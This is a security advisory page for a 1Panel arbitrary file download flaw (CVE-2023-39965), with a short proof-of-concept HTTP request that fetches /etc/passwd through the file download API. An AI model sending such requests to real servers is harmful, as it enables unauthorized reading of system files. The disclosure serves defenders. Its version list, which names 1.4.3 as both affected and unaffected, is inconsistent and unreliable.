Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS04NWNmLWdqMjktZjU1Nc4AA1OE
1Panel Arbitrary File Download vulnerability
Summary
Any file downloading vulnerability exists in 1Panel backend.
Details
Authenticated attackers can download arbitrary files through the API interface. This code has unauthorized access.
PoC
payload:
POST /api/v1/files/download/bypath HTTP/1.1
Host: ip
Content-Type: application/json
{"path":"/etc/passwd"}
Impact
Attackers can freely download the file content on the target system. This will be caused a large amount of information leakage.
Permalink: https://github.com/advisories/GHSA-85cf-gj29-f555JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NWNmLWdqMjktZjU1Nc4AA1OE
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 1 year ago
Updated: about 1 year ago
CVSS Score: 6.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
EPSS Percentage: 0.00052
EPSS Percentile: 0.22857
Identifiers: GHSA-85cf-gj29-f555, CVE-2023-39965
References:
- https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-85cf-gj29-f555
- https://nvd.nist.gov/vuln/detail/CVE-2023-39965
- https://github.com/1Panel-dev/1Panel/releases/tag/v1.5.0
- https://github.com/advisories/GHSA-85cf-gj29-f555
Blast Radius: 1.0
Affected Packages
go:github.com/1Panel-dev/1Panel
Dependent packages: 1Dependent repositories: 0
Downloads:
Affected Version Ranges: = 1.4.3
Fixed in: 1.5.0
All affected versions:
All unaffected versions: 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.4.0, 1.4.1, 1.4.2, 1.4.3, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.6.0, 1.6.1, 1.6.2, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.7.4, 1.8.0, 1.8.1, 1.8.2, 1.8.3, 1.8.4, 1.8.5, 1.9.0, 1.9.1, 1.9.2, 1.9.3, 1.9.4, 1.9.5, 1.9.6